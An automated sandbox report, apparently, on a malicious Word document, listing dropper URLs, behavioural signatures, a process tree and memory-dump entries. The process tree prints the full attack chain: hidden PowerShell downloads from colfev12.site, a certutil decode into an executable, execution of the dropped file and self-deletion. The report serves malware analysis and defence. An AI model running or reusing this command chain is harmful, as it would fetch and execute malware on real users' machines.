Overview

overview

10

task1

 

6

task2

 

10

Analysis

  • max time kernel
    141s
  • resource
    win10v191014
  • submitted
    05-12-2019 20:53

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_92ebafcc950619596e93a4215d05e6cb.doc

  • Sample

    191205-xsaajpnzhs

  • SHA256

    94c241402910892dc472c95bec71350b2201bb0b3216b0ea988782af6a05c08a

Score
10/10
evasionspreadingspywaretrojandiscovery

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://colfev12.site/Bijka.dat
exe.dropper

http://colfev12.site/sfera.dat
exe.dropper

http://colfev12.site/oYWE.dat

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Program crash 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Checks for installed software on the system 1 TTPs 65 IoCs
    discovery
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
    evasionspreading
  • Executes dropped EXE 2 IoCs
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops file in Windows directory 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_92ebafcc950619596e93a4215d05e6cb.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4924
  • C:\Windows\system32\cmd.exe
    cmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" & certutil -decode %temp%\dera %temp%\dera.exe & powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
    1⤵
      PID:4520
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:3492
      • C:\Windows\system32\certutil.exe
        certutil -decode C:\Users\Admin\AppData\Local\Temp\dera C:\Users\Admin\AppData\Local\Temp\dera.exe
        2⤵
          PID:3748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:4028
          • C:\Users\Admin\AppData\Local\Temp\blow.exe
            "C:\Users\Admin\AppData\Local\Temp\blow.exe" dera.exe
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:4104
            • C:\Users\Admin\AppData\Local\Temp\blow.exe
              "C:\Users\Admin\AppData\Local\Temp\blow.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Executes dropped EXE
              PID:2500
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\blow.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4824
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1
                  6⤵
                  • Runs ping.exe
                  PID:4788
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 1356
                5⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious behavior: EnumeratesProcesses
                PID:3396
      • C:\Windows\system32\SppExtComObj.exe
        C:\Windows\system32\SppExtComObj.exe -Embedding
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3660
        • C:\Windows\System32\SLUI.exe
          "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
          2⤵
            PID:4644
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s BITS
          1⤵
          • Drops file in Windows directory
          PID:4740
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
          1⤵
            PID:4700
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k WerSvcGroup
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious use of WriteProcessMemory
            • Suspicious behavior: EnumeratesProcesses
            PID:4556
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
            1⤵
              PID:2008
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
              1⤵
                PID:4448
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                1⤵
                  PID:1376
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s wisvc
                  1⤵
                    PID:1868
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                    1⤵
                      PID:2472
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k unistacksvcgroup
                      1⤵
                        PID:2504
                      • \??\c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                        1⤵
                          PID:2672

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER490A.tmp.csv
                          Download Submit
                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER492A.tmp.txt
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\blow.exe
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\blow.exe
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\blow.exe
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\dera
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\dera.exe
                          Download Submit
                        • C:\Users\Admin\AppData\Local\Temp\oYWE.exe
                          Download Submit
                        • memory/2500-12-0x0000000000E10000-0x0000000000E6D000-memory.dmp
                          Filesize

                          372KB

                          Download
                        • memory/2500-14-0x0000000000E10000-0x0000000000E6D000-memory.dmp
                          Filesize

                          372KB

                          Download
                        • memory/3396-15-0x0000000004220000-0x0000000004221000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-16-0x0000000004620000-0x0000000004621000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-17-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-20-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-22-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-24-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-26-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-28-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-30-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-32-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-34-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-36-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-38-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-40-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-42-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-44-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-46-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-48-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-50-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-52-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-54-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-56-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-58-0x0000000004F20000-0x0000000004F21000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-60-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-61-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-62-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-63-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-64-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-65-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-66-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-68-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-67-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-69-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-70-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-71-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-72-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-74-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-73-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-75-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-76-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-77-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-79-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-78-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-80-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-81-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-82-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-83-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-84-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-85-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-86-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-87-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-88-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-89-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-90-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-91-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-92-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-93-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-94-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-95-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-96-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-97-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-98-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-99-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-100-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-101-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-102-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-103-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-104-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-105-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-106-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-107-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-108-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-109-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-110-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-111-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-112-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-113-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-114-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-115-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-116-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-117-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-118-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/3396-119-0x0000000000BD0000-0x0000000000BD1000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4740-123-0x0000018A152C0000-0x0000018A152C4000-memory.dmp
                          Filesize

                          16KB

                          Download
                        • memory/4740-129-0x0000018A152C0000-0x0000018A152C4000-memory.dmp
                          Filesize

                          16KB

                          Download